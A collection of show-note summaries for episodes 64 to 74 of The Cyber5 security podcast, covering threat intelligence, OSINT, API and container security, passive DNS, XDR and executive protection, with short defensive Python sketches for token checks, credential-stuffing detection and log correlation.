In episode 74 of The Cyber5, we are joined by Robert Gummer, Director of the Global Security Operations Center (GSOC) for the National Football League (NFL). First, we talk about how to expand the mission of a GSOC using open source intelligence. We talk about the role of vendors in the GSOC ecosystem and how open source intelligence can be aggregated in case management systems across all facets of a GSOC fusion center. We also talk about how to educate business stakeholders so they become valuable intelligence consumers. We further discuss how a GSOC can model collection and analysis around successful outcomes for the business, both as a risk management function and as a business enabler. Five Takeaways:

1) Functions of the Modern-Day GSOC: A Blend of Physical and Cyber Security
A GSOC is a fusion center: the blend of physical security, cyber security, emergency preparedness, business continuity, and global investigations around any and all threats to an enterprise. Most physical security threats have a cyber or digital nexus. Active shooters, someone flying a drone over a location, and ransomware that shuts down business continuity are all equal threats to the business that need to be dealt with in a collaborative environment.

2) Key for Open Source Intelligence to Solve Business Problems: Eliminating Coverage Gaps is an 18-Month Process
There are two main categories of datasets to map: traditional open source intelligence and non-traditional open source intelligence. Traditional open source intelligence datasets encompass the qualitative and quantitative collection and analysis of public, non-classified sources that deliver context, such as archives, business records, dating sites, and the dark web. Non-traditional open source intelligence datasets include the human, signals, and imagery intelligence equivalents in OSINT, based on anything from threat actor engagement on social media, to external telemetry (netflow, passive DNS, cookies), to social media photos used to pinpoint locations. Dialing in the threat intelligence landscape and reviewing vendors to determine who has the better social media and data coverage is a lengthy process, sometimes taking 18 months to get right.

3) Aggregation of Intelligence is Still a Maturing Process for Many Physical Security Teams
While mature physical security teams have an incident system that sends notifications for action, there still is not a single source of truth that aggregates everything together. Finding vendors that want to integrate with other vendor platforms is still a challenge. Vendors should not look to displace other vendors; rather, they should try to integrate with systems like a Virtual Contact Center (VCC) platform.

4) Vendor Relationships are Partnerships with Real Intelligence Providers; the GSOC Focuses on Educating Stakeholders to Drive Feedback and Integration with Business Requirements
There is no turnkey solution for triaging alerts in a GSOC, and business stakeholders do not understand the GSOC and open source intelligence space. It takes months of triaging alerts and molding filters to surface the right information that boils down to real threats. Vendor relationships should be leveraged as partnerships to help triage the right alerts, provide actionable intelligence, and integrate with existing enterprise systems. Then GSOC stakeholders can spend more of their time educating business stakeholders to become more valuable intelligence consumers, whose feedback gives enterprises a competitive advantage with regard to risk.

5) Top 10 Use Cases for OSINT: A Review of Tangible Examples
In addition to reputation use cases, such as diligence on social media personalities that could negatively impact brands, below are 10 additional OSINT use cases for the GSOC:
- Executive Protection
- Physical Asset Protection
- Travel Security
- Regulatory/Environmental Risk Specific to the Business
- Geo-Political Risk
- Global Investigations
- Fraud Detection
- Threat Surface Assessment
- M&A Security Due Diligence
- Ethical Hacking
In episode 73 of The Cyber5, we are joined by Snap Finance Chief Security Officer Upendra Mardikar. We discuss how threat intelligence is used in application programming interface (API) security and development security operations (DevSecOps). Any organization building an application has data or user-generated content as the primary product, and once connected to customers, consumers, clients, or partners, a new set of security considerations is generated. The API is the software intermediary that allows two applications to talk to one another. It's bad enough if an attacker exfiltrates sensitive data, but imagine if they can also see who is querying the data held in the application; imagine if Russia could see who is querying certain individuals in a credit bureau dataset. That is a whole other set of problems organizations face. As we've discussed in previous podcasts, DevSecOps is the practice of securing the software development lifecycle (SDLC). We talk about why API security should be added to the wider MITRE ATT&CK framework and further discuss the impact of organizational immaturity on tackling API and DevOps security. Five Key Takeaways:

1) APIs are at the Forefront of Digital Transformation and Must be Protected
APIs run north/south between the company and its customers and east/west to establish interconnectivity between different applications within the enterprise. There is a giant need to go “outside the firewall” to observe threats attacking APIs because they are fundamental to many enterprise functions, regardless of industry.

2) API Security is Very Immature in the Enterprise
Many security practitioners focus on north/south protection of APIs and implement firewalls and DDoS protections to keep intruders out of the environment. This is a myopic strategy because it does not protect against lateral movement and privilege escalation once an attacker compromises perimeter security. When perimeter security is compromised, protecting east/west APIs becomes critical. We are seeing trends around Zero Trust, which is based on the premise that location isn't relevant and that users and devices can't be trusted until they are authenticated and authorized. To gain security from a zero trust model, we must apply these principles to our APIs. This aligns well since modern API-driven software and apps aren't contained in a fixed network (they're in the cloud) and threats exist throughout the application and infrastructure stack. An API-driven application can have thousands of microservices, making it difficult for security and engineering teams to track all development and its security impact. Adopting zero trust principles ensures that each microservice communicates with least privilege, preventing the use of open ports and enabling authentication and authorization across each API (see the sketch following this summary). The end goal is to make sure that one insecure API doesn't become the weakest link and compromise the entire application and data.

3) Integrating API Security into the MITRE ATT&CK Framework
API security is different from traditional application security (OWASP), which is integrated into the MITRE ATT&CK framework along with attacks on servers, endpoints, TLS, and so on. API security focuses more on potential attacks against exposed, internet-facing microservices, in addition to the business logic. API security primarily focuses on:
- Users: The most common API vulnerabilities tend to center on authorization issues that enable access to resources within an API-driven application.
- Transactions: Ensuring that transport layer security (TLS) encryption is enforced for all transactions between the client and the application adds an extra layer of safety. Since modern applications are built on microservices, software developers should enforce encryption between all microservices.
- Data: It is increasingly important to ensure sensitive data is protected both at rest and in motion and that the data can be traced end to end.
- Monitoring: Collecting telemetry or metadata that gives you a panoramic view of an application, how it behaves, and how its business logic is structured.

4) Improvements for Threat Intelligence Against APIs of Applications
Threat intelligence providers need to go beyond the features of user stories and be able to alert and automate when malicious actors are targeting the microservices behind APIs, as the business logic of these APIs is central to business operations.

5) Threat Intelligence Should Integrate with Threat Hunting to Conduct Proper Malicious Pattern Matching and Reduce False Positives
Pattern matching to distinguish malicious behavior from legitimate user traffic has evolved over time:
- Netflow: track network traffic from the routers to the endpoints
- Applications: track application traffic to detect anomalies in authentication
- Data: track data flows in motion and at rest in the data lakes
- Devices: map devices to maintain a proper asset inventory
- Users: track user behavior, such as off-hours queries to sensitive databases
The industry still needs solutions that detect and correlate these behaviors at scale; thus far the space has been extremely fragmented.
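A minimal, stdlib-only sketch of the per-call authentication and least-privilege authorization that the zero trust discussion above calls for: each microservice verifies a signed token and checks a scope before acting. The token format, scope names, and shared key are assumptions for illustration; production systems would typically rely on a standard such as OAuth 2.0 / JWT with mutual TLS rather than this hand-rolled scheme.

```python
import base64, hashlib, hmac, json

SERVICE_KEY = b"shared-secret-for-illustration-only"  # placeholder; use a real secret store

def sign_token(claims: dict) -> str:
    """Issue a token: base64(claims) + '.' + HMAC-SHA256 signature."""
    body = base64.urlsafe_b64encode(json.dumps(claims).encode())
    sig = hmac.new(SERVICE_KEY, body, hashlib.sha256).hexdigest()
    return body.decode() + "." + sig

def verify_token(token: str, required_scope: str):
    """Return claims only if the signature is valid and the scope is authorized."""
    try:
        body, sig = token.rsplit(".", 1)
    except ValueError:
        return None
    expected = hmac.new(SERVICE_KEY, body.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(sig, expected):           # authentication
        return None
    claims = json.loads(base64.urlsafe_b64decode(body))
    if required_scope not in claims.get("scopes", []):   # least-privilege authorization
        return None
    return claims

token = sign_token({"sub": "orders-service", "scopes": ["orders:read"]})
print(verify_token(token, "orders:read"))   # accepted: scope granted
print(verify_token(token, "orders:write"))  # rejected: scope not granted
```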
In episode 72 of The Cyber5, we are joined by DoorDash Application Security Manager Patrick Mathieu. We talk about threat intelligence's role within application security programs, particularly programs focused on fraud. We discuss the importance of prioritizing between what could happen, as often seen in penetration testing, and what is happening, as often seen with threat intelligence. We also talk about the different types of internal and external telemetry that can drive a program and the outcomes that are critical for an application security program to be successful. Three Key Takeaways:

1) Application Security Overlaps and Threat Intelligence Shortcomings
Fraud programs exist to save money, and application security programs exist to discover and mitigate cyber vulnerabilities. However, most of the problems on both sides derive from the same weaknesses introduced in the application architecture during the software development lifecycle (SDLC). Any application development team needs to know the following:
- Attacks: Understand the threat, who is attacking, and what they are attacking. The target could be the server, the client, the user, etc.
- Custom Angles: A fraudster is always going to attack the business logic of an application: the custom rules or algorithms that handle the exchange of information between a database and the user interface.
- Obscurity: The threat will not likely be in the news the way a ransomware group is. As a technology company grows, its application gains interest from fraudsters who will try to abuse it. Threat intelligence falls short in collecting against these actors because the activity is so specific to business logic and does not involve an organized crime group with notoriety or known tactics, techniques, and procedures (TTPs).

2) Common Vulnerabilities in Application Security Pertinent to Fraud
While injection attacks are still common, the most common application vulnerabilities are fraudulent authentication attempts and session hijacking. Microservices (token sessions, for example) are common in applications, but it is very challenging to know who is doing what in the application, for example, whether it is a consumer, an application developer, or a fraudster. Many companies do not have an active asset inventory, particularly for their applications, and there is little visibility into the logs on the web application firewall (WAF). Every application is different, and understanding what is normal versus fraudulent takes time and modeling focused on who is attacking business logic for fraudulent gains (a small detection sketch follows this summary).

3) Application and Security Engineers Must Communicate
Security champion programs are critical to getting application and security engineers to communicate in a way that articulates what is normal in an application. If this collaboration does not work, attackers will collaborate faster and execute first. The adoption rate among application engineers is a better metric to monitor than the remediation of vulnerabilities.
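As a sketch of separating normal users from fraudulent authentication attempts, the snippet below counts failed logins per source IP over a sliding window from already-parsed WAF or auth log records. The field names and threshold are illustrative assumptions; real baselines would be tuned per application.

```python
from collections import defaultdict, deque
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=5)
THRESHOLD = 20  # failed attempts per IP per window; tune against the application's baseline

def detect_credential_stuffing(records):
    """records: iterable of dicts with 'ts' (datetime), 'src_ip', and 'event' keys."""
    recent = defaultdict(deque)   # src_ip -> timestamps of recent auth failures
    alerts = []
    for rec in sorted(records, key=lambda r: r["ts"]):
        if rec["event"] != "auth_failure":
            continue
        q = recent[rec["src_ip"]]
        q.append(rec["ts"])
        while q and rec["ts"] - q[0] > WINDOW:   # slide the window forward
            q.popleft()
        if len(q) >= THRESHOLD:
            alerts.append((rec["src_ip"], rec["ts"], len(q)))
    return alerts

now = datetime.utcnow()
sample = [{"ts": now + timedelta(seconds=i), "src_ip": "198.51.100.9", "event": "auth_failure"}
          for i in range(25)]
print(detect_credential_stuffing(sample))
```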
In episode 71 of The Cyber5, guest Nisos moderator and teammate Matt Brown is joined by security practitioner Matt Nelson. They talk about a recent intelligence blog Matt Nelson wrote on how to operationalize intelligence for the SOC and the outcomes an incident response team looks for from intelligence. They also talk about how to make intelligence more broadly useful for investigations and discuss the intelligence market more holistically. Three Key Takeaways:

1) Threat Intelligence Augments Threat Hunting in the Security Operations Center (SOC)
Intelligence requirements are critical throughout the business, not just in the SOC. Threat intelligence can be a significant help to the threat hunting and detection team. The outcomes threat hunting teams generally look for are:
- Cyber Kill Chain: Analyzing the payload, including the commands it runs, the attack hosting infrastructure, and which ports the infrastructure uses to communicate.
- Target Verification: Identifying who is being targeted, how, and with what intent; context that is often missing when looking solely at forensics data.
- Collection Intent of the Attacker: Determining what kinds of data the attackers are after, which is hard to establish from forensics data alone.
- Target of Opportunity Versus Targeted Attack: Determining whether attacks target the many or the select few is critical for defense strategies. If targeting is directed solely at IT personnel with admin access, that is more significant than a “spray and pray” campaign.
- Outcomes: Outlining detections, protection strategies, and awareness campaigns.

2) Evolving Threat Intelligence Beyond the SOC
Threat intelligence is not just cyber news or an indicators of compromise (IOC) feed. Threat intelligence is useful for insider threat, fraud, platform abuse, corporate intelligence, and supply chain risk.

3) Single Data Aggregators for Enterprises (SIEMs, TIPs, MISP) Aren't the Panacea
The SIEM is not the best place for threat intelligence data because too many internal logs aren't relevant. TIPs are mostly focused externally and are good for IOCs, but correlating threat intelligence that simply repeats what is already known isn't useful. MISP (https://www.misp-project.org/) is open source and can be effective with the right resources. Data modeling and getting the right taxonomy of the data are the most critical pieces.
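Since MISP is called out above as a workable open-source option, here is a short sketch of pulling attributes for a suspicious indicator with PyMISP. The instance URL and API key are placeholders, and the search parameters shown are one common pattern rather than the only way to query a MISP instance.

```python
# pip install pymisp
from pymisp import PyMISP

MISP_URL = "https://misp.example.internal"   # placeholder instance URL
MISP_KEY = "REDACTED_API_KEY"                # placeholder API key

def lookup_indicator(value: str):
    """Return MISP attributes matching an IP, domain, or hash value."""
    misp = PyMISP(MISP_URL, MISP_KEY, ssl=True)
    # Query the attributes controller for the raw indicator value.
    return misp.search(controller="attributes", value=value, pythonify=True)

if __name__ == "__main__":
    for attr in lookup_indicator("203.0.113.7"):
        print(attr.event_id, attr.type, attr.value)
```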
In episode 70 of The Cyber5, we are joined by Open Source Context Director of Operations, Donald McCarthy. We discuss external telemetry available to the private sector, focusing on passive domain name system (passive DNS) and Border Gateway Protocol (BGP) data. These datasets are critical for threat intelligence teams, as they often provide crucial information on attacker infrastructure for the SOC, but they also help solve problems and provide context on a much broader scale. Five Key Takeaways:

1) What is Passive DNS and How is it Collected?
To simplify, passive DNS is a way of storing DNS resolution data so that security teams can reference past DNS record values to uncover potential security incidents or discover malicious infrastructure. Passive DNS is the historical phone book of the internet (see the sketch following this summary). Practitioners can collect it by:
- Collecting on the resolver: Gain access to and enable logging on the resolver, often termed “T-ing the resolver.” The client side of DNS is called a DNS resolver; a resolver is responsible for initiating and sequencing the queries that ultimately lead to a full resolution (translation) of the resource sought, e.g., translation of a domain name into an IP address. DNS resolvers handle various query methods, such as recursive, non-recursive, and iterative.
- Listening on the wire: DNS is port 53 UDP, unencrypted, and many security teams deploy a sensor such as Zeek (formerly Bro), Security Onion, Snort, or Suricata that can collect and parse the data.

2) What is Border Gateway Protocol (BGP)?
BGP is designed to exchange routing and reachability information between autonomous systems on the internet and is often complementary to passive DNS. If passive DNS is the historical phone book of the internet, BGP is its postal service. BGP is the protocol that makes the internet work by enabling data routing. For example, when a user in Thailand loads a website with origin servers in Brazil, BGP is the protocol that allows that communication to happen quickly and efficiently, usually through autonomous systems (ASes). ASes typically belong to internet service providers (ISPs) or other large organizations, such as tech companies, universities, government agencies, and scientific institutions. Much of this information can be collected commercially and is available for purchase.

3) Use Cases for Passive DNS and BGP in the SOC
- Identifying attacker or botnet infrastructure.
- Identifying all internet-facing infrastructure in business use.
- Identifying tactics, techniques, and procedures of attackers.

4) Use Cases for Passive DNS and BGP Outside the SOC
- Verifying internet-facing applications, infrastructure, and signs of compromise for mergers and acquisitions.
- Verifying internet-facing applications, infrastructure, and signs of compromise for suppliers.
- Reviewing staging infrastructure of competitors to scan for product launches.
- Investigating threatening emails to executives.
- Investigating disinformation websites and infrastructure.

5) Enrichment is King and Does Not Need to Be Resource Intensive
If security teams are not engaging with the business to solve problems that put revenue generation at risk, datasets like passive DNS and BGP do not matter. For example, if an organization does not control DNS at its borders, it will lose a lot of the visibility needed to reduce risk and may give away proprietary information.
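A minimal sketch of the "historical phone book" idea above: ingest already-parsed resolver answers and keep first-seen/last-seen timestamps per name/answer pair in SQLite, so analysts can later ask what an attacker domain has pointed to over time. The record format here is invented for illustration; real deployments parse sensor output from tools such as Zeek or Suricata.

```python
import sqlite3
from datetime import datetime

SCHEMA = """CREATE TABLE IF NOT EXISTS pdns (
    rrname TEXT, rrtype TEXT, rdata TEXT,
    first_seen TEXT, last_seen TEXT, count INTEGER,
    PRIMARY KEY (rrname, rrtype, rdata))"""

def ingest(db, records):
    """records: iterable of (timestamp, rrname, rrtype, rdata) tuples from a DNS sensor."""
    for ts, rrname, rrtype, rdata in records:
        # Upsert: new pairs get first_seen; known pairs only advance last_seen and count.
        db.execute("""INSERT INTO pdns VALUES (?, ?, ?, ?, ?, 1)
                      ON CONFLICT(rrname, rrtype, rdata) DO UPDATE SET
                      last_seen = excluded.last_seen, count = count + 1""",
                   (rrname, rrtype, rdata, ts, ts))
    db.commit()

db = sqlite3.connect(":memory:")
db.execute(SCHEMA)
now = datetime.utcnow().isoformat()
ingest(db, [(now, "c2.badsite.example", "A", "203.0.113.7"),
            (now, "c2.badsite.example", "A", "198.51.100.3")])
# Historical question: what has this domain resolved to, and when was each answer first seen?
for row in db.execute("SELECT rdata, first_seen, last_seen, count FROM pdns WHERE rrname = ?",
                      ("c2.badsite.example",)):
    print(row)
```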
In episode 69 of The Cyber5, we are joined by Lima Charlie's CEO, Maxime Lamothe-Brassard. We discuss the future of what's known in the security industry as XDR, which is essentially an enrichment of endpoint detection and response products. Three Key Takeaways: 1) What is XDR? It depends on who you ask. XDR is not another tool, but merely an extension of Endpoint Detection and Response (EDR) products. Gartner expects 50% of mid-market buyers to adopt XDR strategies by 2027. For context, around 2010, cybersecurity vendors started driving stronger antivirus solutions for endpoint computers and servers, called Endpoint Detection and Response (EDR). Antivirus was only catching malware with a known signature and was not able to detect the more malicious lateral movements that are common in today's attacks. Every EDR platform has its own unique set of capabilities. However, some common capabilities include monitoring endpoints in both online and offline mode, responding to threats in real time, increasing visibility and transparency of user data, detecting stored events with malware injections, and creating blacklists and whitelists in integration with other technologies. Now that EDR solutions are firmly within the market, they need to be integrated with other tools, including threat intelligence, to be effective at scale for the enterprise. These massive integrations needed at scale, especially with the cloud, are what is starting to be defined as XDR. 2) What are the key integrations to EDR products that form an XDR strategy? a. Identity Access Management: Gives visibility into who is accessing what applications and websites in the enterprise. b. Threat Intelligence: Information and artifacts from attacker infrastructure, previous compromises, and behavior that can be identified outside of firewalls. c. Cloud and SaaS Logging: Any application in the cloud produces a log for access and use. 3) XDR does not have to be expensive or manpower-intensive for SMBs. a. Cloud, SaaS, and Identity Access Management produce logs that can be integrated into simple solutions that do not need to be complex products, particularly for SMBs. b. Enablement should be the critical aspect of XDR rather than more expensive tooling. c. Easy, automatable solutions to apply security controls are the critical way forward for medium and large enterprises.
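The kind of correlation an XDR strategy implies can be illustrated with a few lines of glue code: take an EDR alert and pull the identity (IAM) and SaaS/cloud log events for the same user within a time window. The event shapes ("ts", "host", "user", "action") are hypothetical; real EDR, IAM, and SaaS products each have their own schemas and APIs, and this is only a sketch of the join, not any vendor's implementation.

```python
"""Minimal sketch: join an EDR alert with identity (IAM) and SaaS/cloud events
for the same user inside a time window, i.e. the correlation XDR promises.

Event field names are hypothetical stand-ins for vendor-specific schemas.
"""
from datetime import datetime, timedelta

def correlate(edr_alert, iam_events, saas_events, window_minutes=60):
    """Return IAM and SaaS events tied to the alert's user within a time window."""
    window = timedelta(minutes=window_minutes)
    alert_ts = datetime.fromisoformat(edr_alert["ts"])

    def related(event):
        return (event["user"] == edr_alert["user"]
                and abs(datetime.fromisoformat(event["ts"]) - alert_ts) <= window)

    return {
        "alert": edr_alert,
        "identity_context": [e for e in iam_events if related(e)],
        "cloud_context": [e for e in saas_events if related(e)],
    }

if __name__ == "__main__":
    alert = {"ts": "2022-03-01T14:05:00", "host": "laptop-042", "user": "jdoe",
             "detection": "credential dumping"}
    iam = [{"ts": "2022-03-01T13:55:00", "user": "jdoe", "action": "mfa_push_denied"}]
    saas = [{"ts": "2022-03-01T14:20:00", "user": "jdoe", "action": "mass_file_download"}]
    print(correlate(alert, iam, saas))
```

For an SMB, even this level of simple, automatable correlation across existing logs captures much of the enablement value without buying another complex product.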
In episode 68 of The Cyber5, we are joined by Executive Director and Head of Global Threat Intelligence for Morgan Stanley, Valentina Soria. We discuss leading a large-scale threat intelligence program in the financial institution space and how to make intelligence absorbable by multiple consumers. We also talk about how intelligence teams can build processes and technology at scale to raise the costs criminals must invest to succeed. Finally, we touch on large enterprises being a value-add to small and medium-sized businesses. Two Key Takeaways: 1) Intelligence is Valued Differently By Different Stakeholders Tactical, operational, and strategic intelligence gains can fill many gaps in the business, inside and outside the security operations function. Good intelligence analysis should make business stakeholders rethink their assumptions about risk and address realities regarding specific scenarios around the state of the organization's risk posture. 2) Begin with the SOC, then Spread Across All Business Sectors Cyber threat intelligence is a journey and it takes time to realize a return on investment. Find coverage gaps in existing controls that already have metrics against them, and use those metrics to demonstrate value, such as: For SOC/CIRT Teams: The number of incidents and issues remediated, the quantity of vulnerabilities patched, and most importantly, an outline of the loss that could have occurred from those exploited vulnerabilities. For Outside the SOC: Inform the business of any type of risk through tactical, strategic, and operational intelligence.
Topic: Value of Securing Containers in the Technology Supply Chain In episode 67 of The Cyber5, we are joined by senior security practitioner Julie Tsai. We discuss security and intelligence in modern-day technology platforms, concentrating on how to secure the impact that container and cloud environments have on the technology supply chain. Compliance and intelligence play a critical role in managing application and development supply chain risk. Specifically, when developers perform code commits and updates, we discuss the criticality of intelligence and compliance to ensure code is truthful, accurate, and complete. Three Key Takeaways: 1) Containers and Virtualization Images Offer Repeatability But Also Potential for Compromise at Scale Containers give software developers the potential to establish an assembly line of repeatable, secure patterns because they are operating system agnostic. However, the upstream effort to harden the container and set the right images and configurations needs to be correct from the beginning. At the same time, mistakes can lead to a compromise at the container or host OS level that affects every container on that host. Container deployments share a kernel, with modular application containers and services on top. Therefore, security practitioners must be mindful of anything that can break out of a container. Furthermore, even with host OS-level hardening, they must ensure a kernel-level compromise cannot impact all the dependent layers. 2) Supply Chain Risk with Containers Supply chain risk in technology is challenging because developers generally borrow code from other developers, and they don't check libraries and dependencies for security issues. In addition, contractual agreements aren't capturing all the supply chain pipeline nuances. It's hard enough to know what's happening inside an enterprise network, let alone understand the provenance and chain of custody of code. Security issues can get injected into the end product when a strict process for container changes is not followed. “Defense in depth” is a classic security principle that matters in securing containers, including application and configuration management. In addition, other aspects like source control, a commit trail, and fingerprinting different kinds of artifacts all act as checks, alongside checksums, to ensure code is updated correctly. 3) Threat Intelligence Fundamentals with Container Security A threat intelligence program needs to start by aligning with the business on the most prevalent threats. A banking site will have different threats than e-commerce, gaming, or a cryptocurrency exchange. Therefore, a threat intelligence program needs to be modular enough to scale to many types of threats as the business grows. More tactically for containers, developers can't tear down environments every time a malicious actor scans them; little work would get done. However, if a threat intelligence team notices regularity or repeatability in scan attempts followed by authentication attempts against the environment, those types of intelligence alerts are fruitful. Intelligence programs show clear value in highly attacked industries (manufacturing, health care, retail, finance). The challenge comes when teams put blinders on and assume the only way they can be attacked is whatever appears in regular threat intelligence blogs.
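The "scan attempts followed by authentication attempts" alert described above can be expressed as a very small piece of logic. Here is a minimal sketch of that correlation over perimeter and authentication events; the event shape ("ts", "src_ip", "kind") and the one-hour window are hypothetical choices, not a prescribed detection.

```python
"""Minimal sketch: flag source IPs whose port-scan activity is followed by
authentication attempts against the same environment within a short window.

Event shapes and the window are hypothetical; in practice these come from
perimeter sensors and authentication logs with their own schemas.
"""
from collections import defaultdict

SCAN = "port_scan"
AUTH = "auth_attempt"

def scan_then_auth(events, window_seconds=3600):
    """Return {src_ip: [(scan_ts, auth_ts), ...]} for scan->auth sequences."""
    by_ip = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        by_ip[e["src_ip"]].append(e)

    suspicious = {}
    for ip, ip_events in by_ip.items():
        pairs = []
        last_scan_ts = None
        for e in ip_events:
            if e["kind"] == SCAN:
                last_scan_ts = e["ts"]
            elif e["kind"] == AUTH and last_scan_ts is not None:
                if e["ts"] - last_scan_ts <= window_seconds:
                    pairs.append((last_scan_ts, e["ts"]))
        if pairs:
            suspicious[ip] = pairs
    return suspicious

if __name__ == "__main__":
    events = [
        {"ts": 1000, "src_ip": "198.51.100.9", "kind": SCAN},
        {"ts": 1900, "src_ip": "198.51.100.9", "kind": AUTH},   # scan then login attempt: flag
        {"ts": 5000, "src_ip": "203.0.113.4", "kind": AUTH},    # login attempt alone: ignore
    ]
    print(scan_then_auth(events))
```

The value is in the sequencing: scans alone are background noise, but a scan followed quickly by an authentication attempt from the same source is worth an analyst's time.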
In episode 66 of The Cyber5, we are joined by H&R Block Chief Information Security Officer (CISO) Josh Brown. In this episode we discuss the importance of building an informed security team that can collect intelligence and set a proper risk strategy. We have a frank conversation about what the business of security means and how to develop a team that understands multiple business lines, so a security team is anchoring its security strategy to how the company drives revenue. We talk through how to do this at scale within the intelligence discipline that touches many lines of risk, not just cybersecurity. Three Key Takeaways: 1) Security Informs the Business to Make Risk-Based Decisions Security professionals must have a deep understanding of how the business functions in order to develop a proper risk-based approach. Security is a risk management function that puts up guardrails so the business avoids bad decisions and does not lose money. Intelligence is critical for gaining a 360-degree view, spanning fraud as well as the user segments of the network. Threat intelligence must be relevant to the specific business, not the industry overall. If there is a threat to a bank, that likely has nothing to do with a tax filing service. 2) Actionable Intelligence That Reduces Business Risk The industry has not yet settled on an intelligence solution. Intelligence is an enrichment function, not the first line of truth on what to prioritize. Fraud and other business-specific data that result in business loss are equally important to funnel into traditional cybersecurity tools. Further, threat feeds and information must be bi-directional, so even competitors and businesses in the same location can understand when incidents are taking place. The threats that most companies face are not those that are regularly marketed, such as Advanced Persistent Threats. The cybersecurity industry does a poor job of conveying the likelihood of a given advanced attack. Business email compromise, account takeovers, and fraud are still the most prevalent styles of attack, even for businesses that can afford sophisticated security technology. 3) Actionable Intelligence That Gives Visibility into Supply Chain Risk “The perimeter” is no longer relevant like it used to be. With work from home, the perimeter is just as much about identity and access management (IAM) as it is about IP space. On third-party supply chain risk, enterprises currently implement scorecard tooling as an audit function so that when a software vulnerability is released, an enterprise can quickly query which suppliers use that library or dependency. Further, supply chain risk is as much about business interruption (DDoS) as it is about suppliers that hold critical data. Major enterprises also care about whether a vendor's vendors are compromised, depending on the criticality of the data (fourth-party supply chain risk). Since the United States does not even have a standard breach notification law, it is going to be very challenging to share intelligence bi-directionally, let alone get developers to uniformly submit secure technology code.
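The "which suppliers use that library?" query described above is simple once an inventory exists. Here is a minimal sketch against a hypothetical, internally maintained supplier inventory; in practice the data might come from supplier questionnaires or software bill of materials (SBOM) documents, and the field names here are illustrative only.

```python
"""Minimal sketch: scorecard-style query answering "which suppliers use this
vulnerable library?" from an internal inventory. The inventory format is
hypothetical; real data could come from questionnaires or SBOM documents.
"""

SUPPLIER_INVENTORY = {
    "TaxFormPrinterCo": {"criticality": "high", "components": ["log4j-core 2.14.1", "openssl 1.1.1k"]},
    "PayrollAPI Inc":   {"criticality": "high", "components": ["openssl 3.0.1"]},
    "OfficeSnacks LLC": {"criticality": "low",  "components": ["wordpress 5.8"]},
}

def suppliers_using(component_name: str, inventory=SUPPLIER_INVENTORY):
    """Return suppliers whose declared components include the named library."""
    hits = []
    for supplier, meta in inventory.items():
        matched = [c for c in meta["components"] if c.split()[0].lower() == component_name.lower()]
        if matched:
            hits.append({"supplier": supplier, "criticality": meta["criticality"], "matches": matched})
    # Triage the highest-criticality suppliers first
    return sorted(hits, key=lambda h: h["criticality"] != "high")

if __name__ == "__main__":
    for hit in suppliers_using("log4j-core"):
        print(hit)
```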
In episode 65 of The Cyber5, we are joined by Jon Iadonisi, CEO and Co-Founder of VizSense. Many people think of open-source intelligence (OSINT) as identifying and mitigating threats for the security team. In this episode, we explore how OSINT is used to drive revenue. We talk about the role social media and OSINT play in marketing campaigns, particularly around brand awareness, brand reputation, go-to-market (GTM) strategy, and overall revenue generation. We also discuss what marketing and security teams can learn from OSINT tradecraft, particularly when there are threats to the brand's reputation. Four Key Takeaways: 1) Even in Marketing, Context and Insights Provide Intelligence, Not Data Raw data is not intelligence; rather, intelligence is a refined product where context is provided around information and data. Similar to the national security and enterprise security world, where adversaries are trying to commit crimes and espionage, businesses want to attract people to their brand. Open-source and social media information are powerful data points when analyzed, providing critical intelligence on what consumers and businesses want to buy. Every human being is now a signal, no different from radio intercepts during Pearl Harbor. 2) The Role of OSINT in Driving Revenue for the Brand; Quantitative and Qualitative Metrics In the security world, attribution to a particular organization matters because that group, whether a hacking group or a terrorist organization, needs credit for its operations to continue to receive funding. In the marketing world, brand intelligence is a crucial piece of the following three elements to influence a person: Persuasive content Delivered from a credible voice Network or audience with a high engagement rate Open-source intelligence can be mined in a way that provides insights stronger than traditional marketing focus groups. While celebrities attract attention, people are likely to follow people like themselves, aka micro-influencers. Quantitatively, increases in revenue, shares, and engagements are critical metrics. Qualitatively, marketing teams can mine social media data to determine what people think about a particular product, to understand how products are performing, and then to design and build future products. The crowd will tell a brand what they want but don't yet have, and that data can be used to build future products. 3) Where Marketing Meets Security: Threats to Brand Reputation Security teams should work with marketing teams daily to protect the brand. In today's threats to brands, the human dimension of what people say online is of equal if not greater importance than the technical signals that show a company has suffered a breach, particularly regarding misinformation and disinformation. The human dimension is converging with the technical dimension, and a truly holistic hybrid model is needed for enterprise security and intelligence teams. An example of reputation threats that happen in business every day: smear campaigns using disinformation and misinformation from competitors introduce uncertainty into a brand's ecosystem. 4) Where Security Meets Marketing: Privacy Taken Seriously Enhances the Brand On the flip side, marketing teams should look for ways to promote the security of their products as business differentiators.
Marketing teams should also consult with the security teams to understand all the different data lakes that are available in social media, dark web, and open source to ensure they can collect on the proper type of sentiment where brands are being discussed.
In episode 64 of The Cyber5, we are again joined by John Marshall, Senior Intelligence Analyst at Okta. We discuss building a threat intelligence program to protect executives, particularly the nuances of being a “solution-side security company”. We discuss a risk-based approach for protecting executives and the data that's important to aggregate and analyze. We also talk about success metrics for intelligence analysis when building an executive protection program. Three Key Takeaways: 1) Plans, Actions, and Milestones Regardless of industry, connecting with your executive team on a personal level to establish trust is the first step in any executive protection program. Communicating plans, actions, and milestones is critical. Within these three segments, intelligence requirements should be tiered into three groups - strategic, operational, and tactical. Strategic: Security of the people, security of places, and security of the brand. Operational: The methodologies and means a security team is going to use to monitor for threats to the brand; specifically, collecting intel on current events, private investigation, travel tracking for executives, and a company-wide messaging system to track employees. Tactical: Day-to-day implementation and integration of the strategic and operational methodologies. 2) Distinguishing Between Targets of Opportunity and Targets of Attack Typical items to review when protecting executives: Weather that's going to impede movement Social media activity that reveals plans for protests or riots near a location of interest Natural disasters Geo-political events The primary mechanisms to protect against targets of opportunity: Background checks Social media monitoring, which includes OSINT monitoring and analysis When the mechanisms used to flesh out targets of opportunity indicate an escalation, where the executive becomes a target of attack, private sector security teams often lack an action arm to dispel that threat and have to rely on law enforcement for investigations. Intelligence analysis and determination of facts should be pursued on any threat so that security teams can effectively request law enforcement intervention, equipped with more information that will allow a faster response. 3) Articulating Success Metrics Pinpointing the right event is the most critical success criterion. Executing the intelligence cycle of planning, collecting, exploiting, analyzing, and disseminating information that an executive can use to answer a “so what?” is still a nuanced concept for many private sector organizations. Documenting “wins” and “losses” is equally critical. Security is a risk management function that exists to keep the workforce safe and doing their jobs. Whether it's getting an executive out of a traffic jam or informing a team of a hurricane happening during a conference to mitigate injury, these should be documented for value-based metrics.
